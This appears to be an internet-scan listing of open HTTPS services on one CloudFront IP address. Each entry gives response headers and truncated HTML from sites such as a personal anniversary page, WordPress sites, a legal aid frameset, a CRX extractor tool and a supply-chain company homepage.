<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · sf.richter-rw.de
2026-01-09 21:53
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 09 Jan 2026 21:53:52 GMT Server: Apache Link: <https://www.richter-rw.de/wp-json/>; rel="https://api.w.org/", <https://www.richter-rw.de/wp-json/wp/v2/pages/930>; rel="alternate"; title="JSON"; type="application/json", <https://www.richter-rw.de/>; rel=shortlink, <https://sf.richter-rw.de/wp-content/cache/minify/818c0.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/85615.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/3ceb8.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/1f540.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/c0b5c.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/49194.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/e6deb.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/18003.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/6178e.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/078d1.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/a8453.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/d8d42.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/fc0e8.css>; rel=preload; as=style Expires: Fri, 09 Jan 2026 22:37:39 GMT Pragma: public Cache-Control: max-age=2627, public Cache-Control: max-age=0, no-cache, s-maxage=10 X-Powered-By: W3 Total Cache/2.8.14 Referrer-Policy: X-Mod-Pagespeed: 1.14.36.1-0 Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 79272ab9b399ee696b329d4f677dca48.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 66KKE_OdclIFXGJMdEICeRMyZY_zBp3JssyOaRHM0dQ771Y2MgkVCg==
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-09 21:28
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Mon, 05 Jan 2026 21:26:31 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 c80ae6bd97b709ed6e4747f0d5ea4efc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: yJEPFtd8nsY_yfnYC1ftfZ5das_1dINmnE8uJpfgH1_VPiHwBiBBqA==
Age: 345694
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · www.legalaidconnections.org
2026-01-09 20:58
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 829
Connection: close
Date: Fri, 09 Jan 2026 20:58:11 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: x-wtc-header,Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 b4904c5988fd0eaae341a12cc47f3766.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: PX2uc_YHLUAuTCttSMA9RwBjajo8N80GXZ4sV9nqkqMCMmaOC4rJpg==
Page title: Atlanta Legal Aid Society, Inc.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<html>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-82274979-1', 'auto');
ga('send', 'pageview');
</script>
<head>
<title>Atlanta Legal Aid Society, Inc. </title>
</head>
<frameset rows="100%,*" border="0">
<frame src="https://events.atlantalegalaid.org/index.php/cocktails-connections-working-draft/" frameborder="0" />
<frame frameborder="0" noresize />
</frameset>
<!-- pageok -->
<!-- 05 -->
<!-- -->
</html>
Open service 13.32.99.35:443 · smmallsonline.com
2026-01-09 20:18
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Date: Fri, 09 Jan 2026 20:18:44 GMT Location: https://www.smmallsonline.com/ Server: CloudFront X-Powered-By: CloudFront X-Redirect-By: WordPress X-Cache: Miss from cloudfront Via: 1.1 b43c04a791e8dcb8ddb6bb0847fcf95a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: G0swvzbj7xxc8sMKDb4rXK1eyUbilg55B3gLFe9ZxHRWC0OSz_GwDg== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · n.fplr.co
2026-01-09 20:04
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 5b6e22c950501920595c86fc25834582.cloudfront.net (CloudFront)
Age: 2400003
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 35RYNs_nnlUTmeKH9xSq5McNVj6J3x0MRB7mYF2NJskuBiid5hiNEg==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · crxextractor.com
2026-01-09 19:57
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12924
Connection: close
Last-Modified: Mon, 04 Dec 2023 21:45:52 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 09 Jan 2026 01:51:41 GMT
ETag: "79adf69782c1a8cac16fa085fbb938c4"
X-Cache: Hit from cloudfront
Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: Fjii1wubknWmG2k38s_7fCB2q4GMP93skigVHhOclgJ3EmnqBs1Pkg==
Age: 65176
Page title: Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.
<!DOCTYPE html><html lang="en"><head><script>!function(e,t,a,n,r){e[n]=e[n]||[],e[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"});var g=t.getElementsByTagName(a)[0],m=t.createElement(a),s="dataLayer"!=n?"&l="+n:"";m.async=!0,m.src="https://www.googletagmanager.com/gtm.js?id="+r+s,g.parentNode.insertBefore(m,g)}(window,document,"script","dataLayer","GTM-FVTW7P4")</script><title>Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.</title><meta name="keywords" content="crx, chrome, extension, get, extract, download, source, code" /><meta name="description" content="Get Chrome Extension as .crx file and extract it's source code in one click, right in your browser." /><meta charset="utf-8" /><meta name="viewport" content="width=device-width" /><meta name="author" content="Vladimir Ignatev" /><link rel="icon" type="image/png" href="images/favicon.png" /><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-FVTW7P4" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div class="breakthrough center nomargin"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div><div class="tool-wrapper"><div class="logo"><img src="images/logo.png" height="50" alt="crx extractor logo"></div><div class="welcome"><div class="row"><div class="twelve columns"><div class="container"><div class="twelve columns"><div class="header-wrapper"><h1>Get .crx Chrome Extension file and extract source code in one click</h1></div><div class="cta-wrapper"><button class="button-primary cta-button" id="cta-letsstart" tabindex="1">Let's start</button></div></div></div></div><div class="twelve columns adsense-top-side hide-small"><div class="adsense-wrapper hide-small" style="margin-top:-17rem"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div></div></div></div><div class="tool container" style="display:none"><div class="row"><div class="five columns"><h3 class="center">Get source code</h3><div id="drop-zone"><div class="thanks" style="display:none"><p>You're awesome! Thank you! ❤</p></div><div class="ui-wrapper"><p>Drop .crx file here or click <br>the button to choose the file</p><input type="file" name="file" id="file" tabindex="5"></div><div class="download-btn-wrapper"><a href="#" style="display:none" tabindex="6" class="download button button-primary">Download source</a></div></div><div class="download-source-err" style="display:none"><p></p></div></div><div class="seven columns"><div class="container"><div class="row"><div class="twelve columns"><h3 class="center">Download .CRX file from the <a href="https://chromewebstore.google.com/" target="_blank" rel="nofollow">Chrome WebStore</a></h3></div></div><div class="row"><div class="twelve columns"><input tabindex="2" id="crx-download-input" class="u-full-width" placeholder="Paste the URL of Chrome Extension here"><button class="download-crx-ok button-primary" tabindex="3">OK</button><a href="#" style="display:none" class="download-crx button button-primary" tabindex="4">Get .CRX</a><p id="crx-suggestion"><i class="typcn typcn-arrow-sync"></i><span class="name">extension</span><span class="link">link</span></p></div></div><div class="row"><div class="twelve columns"><div class
Open service 13.32.99.35:443 · plantryx.com
2026-01-09 19:18
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15550
Connection: close
Date: Fri, 09 Jan 2026 19:18:34 GMT
Last-Modified: Tue, 02 Dec 2025 06:28:23 GMT
ETag: "16f13bad41987047761c6b9cb4ff53b3"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 ab21b6436bc1d51d57b228ad39b1fa54.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 6MwPuoQi9PCiisgD2icCswk1S79en4jTwZ3ysvcsQf-bhyq4lSoqhA==
Page title: Supply Chain AI Solutions By Plantryx
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WP86JFDT');</script>
<!-- End Google Tag Manager -->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<link rel="canonical" href="https://plantryx.com/index.html">
<title>Supply Chain AI Solutions By Plantryx</title>
<link rel="shortcut icon" href="assets/imgs/logos/plantryx-icon.svg" type="image/x-icon">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NGGSZTNBQD"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-NGGSZTNBQD');
</script>
<!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Bootstrap Icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css" rel="stylesheet">
<!-- Custom CSS -->
<link rel="stylesheet" href="assets/css/main.css">
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WP86JFDT"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark fixed-top">
<div class="container">
<a class="navbar-brand" href="index.html">
<img src="assets/imgs/logos/logo.svg" alt="Plantryx" height="40">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link active" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Platform & Solutions
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="solutions/demand-planning.html">Demand Planning</a></li>
<li><a class="dropdown-item" href="solutions/supply-planning.html">Supply Planning</a></li>
<li><a class="dropdown-item" href="solutions/end-to-end-planning.html">End-to-End Planning</a></li>
<li><a class="dropdown-item" href="solutions/platform-capabilities.html">Platform Capabilities</a></li>
<li><a class="dropdown-item" href="solutions/integrations.html">Integrations</a></li>
</ul>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Who We Help
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="industries/mobility-auto.html">Mobility & Auto</a></li>
<li><a class="dropdown-item" href="industries/consumer-goods.html">Consumer Goods</a></li>
<li><a class="dropdown-item" href="industries/energy-commodities.html">Energy & Commodities</a></li>
<li><a class="dropdown-item" href="industries/high-tech.html">High Tech</a></li>
<li><a class="dropdown-item" href="industries/industrial-manufacturing.html">Industrial Manufacturing</a>
</li>
<li><a class="dropdown-item" href="industries/healthcare-life-sciences.html">Healthcare & Life
Open service 13.32.99.35:443 · www.smmallsonline.com
2026-01-09 18:28
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 09 Jan 2026 18:28:38 GMT X-Powered-By: CloudFront Link: <https://www.smmallsonline.com/wp-json/>; rel="https://api.w.org/", <https://www.smmallsonline.com/wp-json/wp/v2/pages/1190>; rel="alternate"; title="JSON"; type="application/json", <https://www.smmallsonline.com/>; rel=shortlink Server: CloudFront X-Cache: Miss from cloudfront Via: 1.1 c80ae6bd97b709ed6e4747f0d5ea4efc.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: xz-XIyz-tklYOnHszHoai0c0CTI19FzMP4752ZpkXCUmY8PLeyeJLw== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · exchange-ui-master.rnd.exberry-rnd.io
2026-01-09 17:01
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1382
Connection: close
Last-Modified: Mon, 05 Jan 2026 08:48:56 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 09 Jan 2026 17:01:54 GMT
Cache-Control: max-age=0
ETag: "48a3b3cdc2ff8a944846b9bb4494b504"
X-Cache: RefreshHit from cloudfront
Via: 1.1 2a44338adc8233e5b25aca28287a69c8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: wPlFGWUl7u136odYRKaDazDQVVc9Lh8xYVO43XmF0SFwBCySOIieww==
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: Origin
Page title: Exberry Master Exchange
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="description" content="Web application for traders" />
<meta name="title" content="Exberry Master Exchange" />
<title>Exberry Master Exchange</title>
<link rel="mask-icon" href="/static/favicon.png" color="#FFFFFF" />
<link rel="shortcut icon" id="favicon" href="/static/favicon.png" type="image/png" />
<link rel="apple-touch-icon" href="/static/apple-touch-icon.png" sizes="180x180" />
<link rel="alternate icon" href="/static/favicon.png" type="image/png" sizes="32x32" />
<link rel="manifest" href="/manifest.webmanifest">
<meta name="theme-color" content="#ffffff" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<!-- MUI font -->
<link
href="https://fonts.googleapis.com/css2?family=Noto%20Sans:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap"
rel="stylesheet"
/>
<!-- Default loaded css only spinner -->
<script type="module" crossorigin src="/assets/index-C2Taj5Xb-1767602871694.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-NTh3zHMw-1767602871694.css">
<script id="vite-plugin-pwa:register-sw" src="/registerSW.js"></script></head>
<body>
<div id="root">
<div id="loading"></div>
</div>
</body>
</html>
Open service 13.32.99.35:443 · triathlon-lumina.com
2026-01-09 08:17
HTTP/1.1 403 Forbidden Server: CloudFront Date: Fri, 09 Jan 2026 08:17:22 GMT Content-Type: text/html Content-Length: 919 Connection: close X-Cache: Error from cloudfront Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: QYkKgbVohkg6pwFOfDnXKeeqR2w-woZ8tx-XdMJDrnwy7l7OXMxWLA== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: QYkKgbVohkg6pwFOfDnXKeeqR2w-woZ8tx-XdMJDrnwy7l7OXMxWLA== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · mastersuite.com
2026-01-09 05:24
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2976
Connection: close
Last-Modified: Wed, 21 Oct 2020 03:10:47 GMT
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 09 Jan 2026 03:47:18 GMT
ETag: "166b685d213cebc0f3a7336fd56d85d8"
X-Cache: Hit from cloudfront
Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: zvB-tH-g7tzNcKg7tBlj9jmgBboT_7bcby9wSQAysElZ53A8mPnn0g==
Age: 72571
Page title: MasterSuite
<!doctype html><html lang="en"><head><meta charset="utf-8"/><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="pragma" content="no-cache"><link rel="shortcut icon" href="/favicon.ico"/><link href="https://use.fontawesome.com/releases/v5.0.1/css/all.css" rel="stylesheet"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><meta name="theme-color" content="#000000"/><meta name="description" content="Generate free floorplans for a house fast and easily in 3D & 2D on any device."/><link rel="manifest" href="/manifest.json"/><link href="https://fonts.googleapis.com/css?family=Montserrat:400,700,200" rel="stylesheet"/><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css" integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous"><title>MasterSuite</title><script data-ad-client="ca-pub-1272955356336444" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><link href="/static/css/2.790a2e7e.chunk.css" rel="stylesheet"><link href="/static/css/main.d75480aa.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><script>!function(e){function r(r){for(var n,l,a=r[0],i=r[1],p=r[2],c=0,s=[];c<a.length;c++)l=a[c],Object.prototype.hasOwnProperty.call(o,l)&&o[l]&&s.push(o[l][0]),o[l]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(f&&f(r);s.length;)s.shift()();return u.push.apply(u,p||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,a=1;a<t.length;a++){var i=t[a];0!==o[i]&&(n=!1)}n&&(u.splice(r--,1),e=l(l.s=t[0]))}return e}var n={},o={1:0},u=[];function l(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return 